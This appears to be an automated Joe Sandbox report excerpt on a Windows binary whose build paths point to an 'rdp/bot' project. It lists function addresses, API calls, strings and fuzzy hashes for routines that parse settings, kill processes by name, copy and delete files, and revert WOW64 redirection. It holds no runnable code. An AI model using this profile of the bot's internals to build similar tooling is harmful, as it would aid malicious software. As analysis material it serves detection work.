_errno.MSVCRT ref: 00007FF64B93A32C

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B93A2E6
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF64B93A353
ini_get_uint64, xrefs: 00007FF64B93A2DF, 00007FF64B93A34C
(value != NULL), xrefs: 00007FF64B93A2D8
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF64B93A2D1

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: 0ca38be50db268a6cad6d239e6e380c7a805df0f1447118d3c9ec6f79f631668
Instruction ID: ef307125b8cfcdda9e02660a5ff194cb359e68028d06359acf5218430875ea6a
Opcode Fuzzy Hash: 0ca38be50db268a6cad6d239e6e380c7a805df0f1447118d3c9ec6f79f631668
Instruction Fuzzy Hash: 76217E2260CA4695E361BF55E8407AA3761BB4E784F444036EE4CC7A76DF3DD886C700

Function 00007FF64B93A824 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF64B93A8CD
VirtualProtect.KERNEL32 ref: 00007FF64B93A935
GetLastError.KERNEL32 ref: 00007FF64B93A93F

Strings

Unknown pseudo relocation protocol version %d., xrefs: 00007FF64B93A829
VirtualProtect failed with code 0x%x, xrefs: 00007FF64B93A945
Mingw-w64 runtime failure:, xrefs: 00007FF64B93A7EB
Address %p has no image-section, xrefs: 00007FF64B93A885
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF64B93A8E2

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuery
String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 637304234-2693646698
Opcode ID: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
Instruction ID: 1348ae997fd7bf55f38ed075bdea126dad51aa18254f2622cb0c9078a4d90539
Opcode Fuzzy Hash: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
Instruction Fuzzy Hash: D0319C75B0DA0286EA10BF11E8912A963A1EF8EB94F449135DE1DC77BADE3CE447C740

Function 00007FF64B939F70 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 70COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF64B93A00E
_errno.MSVCRT ref: 00007FF64B93A02C
_errno.MSVCRT ref: 00007FF64B93A034

Strings

[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF64B93A05C
ini_get_uint16, xrefs: 00007FF64B939FED, 00007FF64B93A055
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B939FF4
(value != NULL), xrefs: 00007FF64B939FE6
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF64B939FDF

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
API String ID: 2918714741-1991603811
Opcode ID: fe742d66581b0ccb4e8f88428579443916f0f27324e58e89ecaf8bb4bd76b93c
Instruction ID: d4cd75870040db3db0e95fb3337f3ba310cdb02a4a8b2828e8bd5fd9d9bd28eb
Opcode Fuzzy Hash: fe742d66581b0ccb4e8f88428579443916f0f27324e58e89ecaf8bb4bd76b93c
Instruction Fuzzy Hash: 9F218822A0CA4792E361BF51E840BAA7760BB4E784F145035EE5DC7A76DF3DE846C700

Function 00007FF64B932463 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF64B932487
strcmp.MSVCRT ref: 00007FF64B9324CA
OpenProcess.KERNEL32 ref: 00007FF64B9324E2
TerminateProcess.KERNEL32 ref: 00007FF64B9324FC
GetLastError.KERNEL32 ref: 00007FF64B93250A
Process32Next.KERNEL32 ref: 00007FF64B9326F5
GetLastError.KERNEL32 ref: 00007FF64B932704
CloseHandle.KERNEL32 ref: 00007FF64B932895

Strings

[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF64B93251C
process_kill, xrefs: 00007FF64B932515
, xrefs: 00007FF64B93253C

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 1211020085-2360327764
Opcode ID: 2496d2f5fa8d00559008dfae579644d76cd319a1d0937b540e789750984efad3
Instruction ID: be1cc086460238fa9ec655e87508360933785f8120788ccc3c82c3f2d17f206f
Opcode Fuzzy Hash: 2496d2f5fa8d00559008dfae579644d76cd319a1d0937b540e789750984efad3
Instruction Fuzzy Hash: 21118E15A1D70342FE9DBB55E49433A3691AF5F785F042035CD1ECAAB7DE2EF8458201

Function 00007FF64B93246A Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF64B932487
strcmp.MSVCRT ref: 00007FF64B9324CA
OpenProcess.KERNEL32 ref: 00007FF64B9324E2
TerminateProcess.KERNEL32 ref: 00007FF64B9324FC
GetLastError.KERNEL32 ref: 00007FF64B93250A
Process32Next.KERNEL32 ref: 00007FF64B9326F5
GetLastError.KERNEL32 ref: 00007FF64B932704
CloseHandle.KERNEL32 ref: 00007FF64B932895

Strings

[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF64B93251C
process_kill, xrefs: 00007FF64B932515
, xrefs: 00007FF64B93253C

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 1211020085-2360327764
Opcode ID: a959144ebdbb34fc87530ded86d3f35840680b6be22af1ffe380b90cd5227081
Instruction ID: 58ce54174f340354929868b136f5192599405d1ee358705cbf64ad4809788b49
Opcode Fuzzy Hash: a959144ebdbb34fc87530ded86d3f35840680b6be22af1ffe380b90cd5227081
Instruction Fuzzy Hash: 87119011A1D70342FE9CBB55E49433A3691AF5F785F042035CD1ECAAB7DE2EF8458200

Function 00007FF64B932471 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF64B932487
strcmp.MSVCRT ref: 00007FF64B9324CA
OpenProcess.KERNEL32 ref: 00007FF64B9324E2
TerminateProcess.KERNEL32 ref: 00007FF64B9324FC
GetLastError.KERNEL32 ref: 00007FF64B93250A
Process32Next.KERNEL32 ref: 00007FF64B9326F5
GetLastError.KERNEL32 ref: 00007FF64B932704
CloseHandle.KERNEL32 ref: 00007FF64B932895

Strings

[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF64B93251C
process_kill, xrefs: 00007FF64B932515
, xrefs: 00007FF64B93253C

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 1211020085-2360327764
Opcode ID: ef7e762a1eac82a88f4eb49202e04d18e0dfc05369fbeb0f336ab9798df975d3
Instruction ID: a446310db21dfadd7f2694cffd6c68f5931d1b0787e68a35cde11ec6640e9dee
Opcode Fuzzy Hash: ef7e762a1eac82a88f4eb49202e04d18e0dfc05369fbeb0f336ab9798df975d3
Instruction Fuzzy Hash: D0119011A1D70342FE9CBB55E48433A3691AF5F785F042035CD1ECAAB7DE2EF8458600

Function 00007FF64B93255D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF64B932487
strcmp.MSVCRT ref: 00007FF64B9324CA
OpenProcess.KERNEL32 ref: 00007FF64B9324E2
TerminateProcess.KERNEL32 ref: 00007FF64B9324FC
GetLastError.KERNEL32 ref: 00007FF64B93250A
Process32Next.KERNEL32 ref: 00007FF64B9326F5
GetLastError.KERNEL32 ref: 00007FF64B932704
CloseHandle.KERNEL32 ref: 00007FF64B932895

Strings

[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF64B93251C
process_kill, xrefs: 00007FF64B932515
, xrefs: 00007FF64B93253C

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 1211020085-2360327764
Opcode ID: 84487d85988c67a68760dd499a58440e7c90953792b81ae61c4816666b24c856
Instruction ID: 887d1d7bb2357dc8cc07f25653b6e8c11f41b9f5dd6671ea203e2fd6293fca86
Opcode Fuzzy Hash: 84487d85988c67a68760dd499a58440e7c90953792b81ae61c4816666b24c856
Instruction Fuzzy Hash: E4119011A1D70342FE9C7B55E48433A3691AF5F785F042035CD1EC6AB7DE2EF8458200

Function 00007FF64B935189 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32 ref: 00007FF64B935227
GetLastError.KERNEL32 ref: 00007FF64B935242

Part of subcall function 00007FF64B9314E2: fwrite.MSVCRT ref: 00007FF64B93158E
Part of subcall function 00007FF64B9314E2: fflush.MSVCRT ref: 00007FF64B93159A

Strings

[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu), xrefs: 00007FF64B935260
NULL, xrefs: 00007FF64B935385, 00007FF64B935391
[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x), xrefs: 00007FF64B9351FD
[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d), xrefs: 00007FF64B9353AE
fs_file_copy, xrefs: 00007FF64B9351F6, 00007FF64B935259, 00007FF64B9353A7

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: CopyErrorFileLastfflushfwrite
String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
API String ID: 2887799713-3464183404
Opcode ID: 66f0d41b67bf7db472c2c6d003715f51e780ae4141bf3cabbed7ce59c5551692
Instruction ID: cf56bd6b9721cffd4f84d5c8a8283933a00c83e19a3d28adfcf94989a44a20e1
Opcode Fuzzy Hash: 66f0d41b67bf7db472c2c6d003715f51e780ae4141bf3cabbed7ce59c5551692
Instruction Fuzzy Hash: CB41AF50D0D61686FAA4B656E84037926907F0FBCCF556132C91FC7BB6EFACEA818301

Function 00007FF64B934BBD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32 ref: 00007FF64B934BD4
GetLastError.KERNEL32 ref: 00007FF64B934C2B

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934C14
NULL, xrefs: 00007FF64B934D5A
fs_file_delete, xrefs: 00007FF64B934C0D, 00007FF64B934C39, 00007FF64B934D69
[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu), xrefs: 00007FF64B934C40
[I] (%s) -> Done(path=%s), xrefs: 00007FF64B934D70

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
API String ID: 2018770650-4119452840
Opcode ID: 402f7a1f0eb8c196b54f707917abb0ee0b10649b0644a9a96accee421510c626
Instruction ID: 14ffe684ea2e13f6307e38c33bb02d79be11ef9d264b06d9b15031ce77339740
Opcode Fuzzy Hash: 402f7a1f0eb8c196b54f707917abb0ee0b10649b0644a9a96accee421510c626
Instruction Fuzzy Hash: A3310C55E0C60792FAA076ACE4407BC22615F8F744F5B2032C92ECBBF3ED1CA9859312

Function 00007FF64B93749C Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF64B9374D6
strlen.MSVCRT ref: 00007FF64B9374E1

Strings

((match == NULL) || (match_len != NULL)), xrefs: 00007FF64B93757E
str_match, xrefs: 00007FF64B937513, 00007FF64B93754C, 00007FF64B937585
(needle != NULL), xrefs: 00007FF64B93750C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B93751A, 00007FF64B937553, 00007FF64B93758C
C:/Projects/rdp/bot/codebase/utils.c, xrefs: 00007FF64B937505, 00007FF64B93753E, 00007FF64B937577
(pattern != NULL), xrefs: 00007FF64B937545

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: strlen
String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
API String ID: 39653677-892027187
Opcode ID: b879f136bf3e73caf27cf456f8a81fbe1e6f740427478c846f9f963f1a0f41ab
Instruction ID: 5f62cce728094c61b5dfd1ed3a4b5e75d3b16ef0371244aa81e8d942133721c5
Opcode Fuzzy Hash: b879f136bf3e73caf27cf456f8a81fbe1e6f740427478c846f9f963f1a0f41ab
Instruction Fuzzy Hash: 42510191B0D29781FA65BA19E820BB916507F0F78CF582032D91ECBBB7DE2CE9418301

Function 00007FF64B936C99 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF64B936D12
strlen.MSVCRT ref: 00007FF64B936D2E
strcat.MSVCRT ref: 00007FF64B936D3D
strlen.MSVCRT ref: 00007FF64B936D48

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B936CFC
fs_module_file, xrefs: 00007FF64B936CF5
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B936CE7
(file_path != NULL), xrefs: 00007FF64B936CEE

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: strlen$strcat
String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
API String ID: 2335785903-2423714266
Opcode ID: 5f7ae23b154488ead1e5c0282a80bf8b4d26c10dc2c32ebd1ce7abcaca5ce085
Instruction ID: 6e5f8ac28ece1a604b62bb626614a09c74ccf62a0568d97c6caffe3248a76a20
Opcode Fuzzy Hash: 5f7ae23b154488ead1e5c0282a80bf8b4d26c10dc2c32ebd1ce7abcaca5ce085
Instruction Fuzzy Hash: 1411AC61A0CA4344FA157F26E8143F956919F0FB88F4CA030DE2DCA7A7EE2CA4018350

Function 00007FF64B93CACD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98stringCOMMON

Download Yara Rule

APIs

fwprintf.MSVCRT ref: 00007FF64B93CB20
fwprintf.MSVCRT ref: 00007FF64B93CB34
strlen.MSVCRT ref: 00007FF64B93CB9A

Strings

%.*S, xrefs: 00007FF64B93CB2D
%*.*S, xrefs: 00007FF64B93CB10
%-*.*S, xrefs: 00007FF64B93CB19

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fwprintf$strlen
String ID: %*.*S$%-*.*S$%.*S
API String ID: 2636243462-2115465065
Opcode ID: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
Instruction ID: 32b117da8eda7e5e06674a1b18deb3294a3b624fb3fac7e5e21af5068741f7e9
Opcode Fuzzy Hash: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
Instruction Fuzzy Hash: 3E319062E1CB5286E750BA35E804579A2B1EB4EBA8F04D131DD1DCBBA7DE2CE450CB40

Function 00007FF64B93385C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64B931CF4: LoadLibraryA.KERNEL32 ref: 00007FF64B931D02

GetLastError.KERNEL32 ref: 00007FF64B9338D8

Part of subcall function 00007FF64B931C73: GetProcAddress.KERNEL32 ref: 00007FF64B931C93

Strings

Wow64RevertWow64FsRedirection, xrefs: 00007FF64B93387D
fs_wow_redir_revert, xrefs: 00007FF64B9338BB, 00007FF64B9338E1
Done, xrefs: 00007FF64B9338B4
kernel32, xrefs: 00007FF64B933869
[I] (%s) -> %s, xrefs: 00007FF64B9338C2
[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu), xrefs: 00007FF64B9338E8

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProc
String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
API String ID: 3511525774-1584720945
Opcode ID: 581d58713fef439bd45245ce21fe2b6351d16353e86ecf35ae421406ccb4171c
Instruction ID: 7ca7e4b7cf0126df7cd07d63e5f77357af52d9288cebc164ac46c1a1c4b9214c
Opcode Fuzzy Hash: 581d58713fef439bd45245ce21fe2b6351d16353e86ecf35ae421406ccb4171c
Instruction Fuzzy Hash: 6511D760F1DA4791FB54BB29E8913B423A0AF5F304F946036D42EC66B3EE6CE949C300

Function 00007FF64B9337C0 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64B931CF4: LoadLibraryA.KERNEL32 ref: 00007FF64B931D02

Part of subcall function 00007FF64B931C73: GetProcAddress.KERNEL32 ref: 00007FF64B931C93

GetLastError.KERNEL32 ref: 00007FF64B933820

Part of subcall function 00007FF64B9314E2: fwrite.MSVCRT ref: 00007FF64B93158E
